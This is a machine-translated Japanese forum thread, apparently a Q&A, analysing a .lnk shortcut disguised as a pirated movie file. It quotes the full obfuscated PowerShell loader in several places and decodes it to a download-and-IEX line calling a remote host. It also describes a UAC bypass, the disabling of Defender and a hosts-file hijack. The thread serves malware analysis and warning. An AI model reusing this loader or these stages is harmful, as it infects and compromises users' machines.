一目で.avi
のファイルを取得しましたが、実際には.lnk
ファイルであることがわかりましたが、遅すぎました。
そして、そのファイルのターゲット要素属性はC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP [stRiNG]::join('',(( 26 ,95 , 77 , 78 , 70 ,30,3 , 30, 22 , 22, 112,91 , 73 ,19,113, 92, 84,91 , 93,74 , 30, 109 , 71 ,77, 74,91,83 ,16 ,112 ,91 , 74, 16, 105,91 ,92 , 125 , 82
です
開始点は次のとおりです:%SYSTEMROOT%\System32\WindowsPowerShell\v1.0
次のASCIIコードから文字列を作成しましたが、それはHallo World!
のBASE64形式のようです。NoPr
が見つからなかったので、とても混乱しているようです。 、Wind
およびeXEc
パラメータは、Powershellのドキュメントのどこかにあります。さらに、何らかの理由で、ファイルの説明フィールドから.avi
値を削除するまで、ファイルのサイズは700MBでした。
このファイルが何をしようとするか知っていますか?
これは間違いなくマルウェアです!
基本的に、これは複数のステージを持つマルウェアです。これまでのところ、私は経験しました:
http://zvd.us/1 からPowerShellコードをダウンロードして実行します
ダウンロードしたPowerShellコードには https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1 の逐語的コピーが含まれています。これはUACバイパスのようです。次に、(管理者として)バッチファイルをダウンロードして実行します。
バッチファイルは、最初にすべてのWindows Defenderコンポーネント(ドライバー、スケジュールされたタスク、自動実行エントリ)を無効にしようとし、その効果にグループポリシーを追加します。次に、2つのファイルをダウンロードして実行します。ウイルスの合計リンクをファイルに投稿します。
1つ目は、認められたマルウェアのようです。一方、2つ目は、まだ完全に分析する必要があるNSISインストーラーです。システムのhosts
ファイルを独自のファイルに置き換えて、多くのドメインを80.241.222.137にリダイレクトし、ルート証明書をインストールするようです。
同じことが私のパートナーのコンピューターでも起こったので、私はこれで少し先に進みました。 LNKファイルのターゲットは、実際にはプロパティウィンドウのボックスに収まるものよりもはるかに長くなります。 linkanalyzer を使用して、ターゲット全体を取得しました。
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP [stRiNG]::join('',(( 26 ,95 , 77 , 78 , 70 ,30,3 , 30, 22 , 22, 112,91 , 73 ,19,113, 92, 84,91 , 93,74 , 30, 109 , 71 ,77, 74,91,83 ,16 ,112 ,91 , 74, 16, 105,91 ,92 , 125 , 82 ,87, 91 , 80 ,74 ,23 , 23,16,122,81 ,73,80 ,82 , 81 , 95, 90 , 109, 74 ,76,87,80 , 89,22, 25 , 86 , 74, 74 ,78, 4, 17 ,17 , 68,72 , 92 ,16 ,75,77 ,17 ,15 ,25,23 ,5 , 119, 123 ,102 ,30, 26, 95, 77 ,78 , 70 )|fOReAch-ObjECT {[cHAr] ($_ -bXOr'0x3E')}) ) | .( $EnV:coMsPeC[4,24,25]-jOiN'')
上記のコマンドでは、|.
までのすべてが数値のリストを作成し、各数値に対して何らかのバイナリXOR操作を実行してから、結果を文字列として結合します。これはコードを難読化する方法であると私は信じています。
$aspx = ((New-Object System.Net.WebClient)).DownloadString('http://zvb.us/1');IEX $aspx
次に、これが( $EnV:coMsPeC[4,24,25]-jOiN'')
にパイプされます。
COMSPECはコマンドラインインタープリターですが、[4,24,25]-jOiN
の部分が何をすべきかわかりません。最良の場合は、DownloadString
関数のURLをダウンロードするだけです。最悪の場合、何かをダウンロードして実行します。 URLをたどる勇気がない。
全体的に見て、これはマルウェアに非常によく似ていると思いますが、powershellの経験を持つ誰かがコメントできればすばらしいと思います。
@zoredacheはjistを持っているようです。バイパスモードで実行ポリシーがロードされたnoprofileを使用してウィンドウでコマンドを実行するだけです(コード署名は必要ありません)。
次の方法でテストできます(最後に3つの括弧を追加しましたが、何か不足しているように感じます)。
$value = [stRiNG]::join('',(( 26 ,95 , 77 , 78 , 70 ,30,3 , 30, 22 , 22, 112,91 , 73 ,19,113, 92, 84,91 , 93,74 , 30, 109 , 71 ,77, 74,91,83 ,16 ,112 ,91 , 74, 16, 105,91 ,92 , 125 , 82)))
Write-Host $value
2695777870303302222112917319113928491937430109717774918316112917416105919212582
そのコードが何であるかはわかりませんが、DEC ASCII文字コードを文字列に連結することが考えられていました。あなたの "Hallo World!"は、私が言えることからずれているようです。手始めに、あなたが持っている文字列にはもっとたくさんの文字があります。
http://www.asciitable.com/ は次のことを示唆しています。
SUB _ M N F RS ETX RS SYN SYN p [I DC3 q\T [] J RS m G M J [S DLE p [J DLE i Z \} R
マルウェア。隠された
https://thepiratebay.rocks/torrent/26213608/Bohemian_Rhapsody_2018.720p.DVDRip.x264.DTS-1XBET
グーグル経由でこのスレッドを見つけました。これはウイルス/マルウェアなどであり、PCをねじ込む可能性があります。 PirateBayのさまざまな大きなファイルに添付され、PCにがらくたをインストールするコードを隠します。実行しないでください。すぐに削除します。これはPirateBayの「Bohemian Rhapsody 2018.avi」映画にありますが、700mgファイルは単なるスペースであり、実際にはがらくたへのシンボリックリンク/ショートカットです。プロパティタブを確認します。
C:\ Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP [stRiNG] :: join( ''、((26、95、77、78、70、30,3、 30、22、22、112、91、73、19、113、92、84、91、93、74、30、109、71、77、74、91、83、16、112、91、74、16、105、 91、92、125、82